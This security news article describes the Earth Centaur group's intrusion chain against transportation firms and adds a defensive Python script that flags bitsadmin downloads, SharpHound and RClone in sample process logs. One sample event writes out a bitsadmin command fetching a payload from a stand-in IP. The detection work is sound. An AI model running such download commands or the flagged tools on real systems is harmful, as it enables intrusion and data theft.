Long-term monitoring of the Earth Centaur group has revealed additional information about its tools and techniques. The group was found targeting transportation firms and government agencies associated with the transportation sector.
What was discovered?
Trend Micro has been monitoring the group’s activities for a long time, and that work has now culminated in the detailed insights that follow.
The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks.
The threat actor has ample red-team experience and the skills to bypass security controls and keep operating uninterrupted.
Depending on the victim’s infrastructure, the group deploys backdoors that speak different protocols, together with reverse proxies, to evade network security systems.
The group also relies on open-source frameworks to develop new backdoor variants efficiently.
The infection chain
The intrusion process used by Earth Centaur can be divided into multiple stages such as entry point, first stage, second stage, and post-exploitation.
For an entry point, the group uses ProxyLogon exploits, web shells, and bitsadmin tools to download the first-stage loader (detected as Nerapack), along with the payload file (.bin).
In the second stage, they use multiple backdoors (ChiserClient, HTShell, Customized Lilith and Gh0st, SmileSvr) for communication using common network protocols.
By blending into common protocols, the group can slip past network security systems that only inspect for unusual traffic.
In the post-exploitation phase, the threat actor uses multiple hacking tools (e.g. SharpHound, RClone) to find and target machines on the victim’s intranet.
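The stages above give a defender three concrete process-level signals to hunt for: bitsadmin being used to download a payload (especially when spawned by a web-server process, which is what a web shell would do), SharpHound running for Active Directory discovery, and RClone moving data. The script below is an added example written for this page, not code from Trend Micro's report; it runs simple detection rules over constructed process-creation events and maps each hit to the intrusion stage described above. The host names, command lines and the IP address in the sample events are made up.

```python
import re

# Constructed process-creation events for illustration only (not from the report).
SAMPLE_EVENTS = [
    {"host": "web01", "parent": "w3wp.exe",
     "cmd": "bitsadmin /transfer job1 /download /priority high "
            "http://198.51.100.23/update.bin C:\\Windows\\Temp\\update.bin"},
    {"host": "ws07", "parent": "cmd.exe",
     "cmd": "SharpHound.exe -c All --zipfilename out.zip"},
    {"host": "ws07", "parent": "cmd.exe",
     "cmd": "rclone.exe copy C:\\Users\\alice\\Documents remote:backup"},
    {"host": "ws12", "parent": "explorer.exe",
     "cmd": "notepad.exe C:\\Users\\bob\\notes.txt"},
    {"host": "srv03", "parent": "svchost.exe",
     "cmd": "bitsadmin /list"},  # benign use: listing jobs, no download
]

# Each rule maps a command-line pattern to the stage of the Earth Centaur chain it fits.
RULES = [
    ("bitsadmin_download",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*?(?:/transfer|/download|/addfile)", re.I),
     "entry point / first-stage loader download"),
    ("sharphound",
     re.compile(r"\bsharphound(?:\.exe|\.ps1)?\b", re.I),
     "post-exploitation (Active Directory discovery)"),
    ("rclone",
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move|copyto)\b", re.I),
     "post-exploitation (data staging / transfer)"),
]

# Web-server worker processes: a downloader spawned by one of these is a web-shell pattern.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe"}


def classify(event):
    """Return a list of findings for a single process-creation event."""
    findings = []
    for name, pattern, stage in RULES:
        if not pattern.search(event["cmd"]):
            continue
        severity = "medium"
        if name == "bitsadmin_download" and event["parent"].lower() in WEB_SERVER_PARENTS:
            severity = "high"  # web server spawning a downloader: likely web-shell activity
        findings.append({"host": event["host"], "rule": name,
                         "stage": stage, "severity": severity})
    return findings


def scan(events):
    """Run every rule over every event and collect the findings."""
    return [f for e in events for f in classify(e)]


def hosts_with_post_exploitation(findings):
    """Hosts on which more than one post-exploitation tool was seen, sorted by name."""
    by_host = {}
    for f in findings:
        if f["stage"].startswith("post-exploitation"):
            by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in by_host.items() if len(rules) > 1)


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['host']:6} {f['rule']:18} -> {f['stage']}")
    print("hosts with multiple post-exploitation tools:",
          hosts_with_post_exploitation(scan(SAMPLE_EVENTS)))
```

The rules are deliberately narrow: `bitsadmin /list` and ordinary user programs produce no finding, while a BITS download launched from an IIS worker process is raised to high severity because that parent-child relationship is what a web shell leaves behind. In a real deployment the same logic would be expressed in the SIEM's query language and the parent-process check extended to whatever web servers the organization runs.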
Experts opine that the recently observed activities of the Earth Centaur group could be just the tip of the iceberg compared with the group’s wider operations. However, the shared information allows a better understanding of how the threat enters and operates within a victim’s network, so that more effective security measures can be implemented.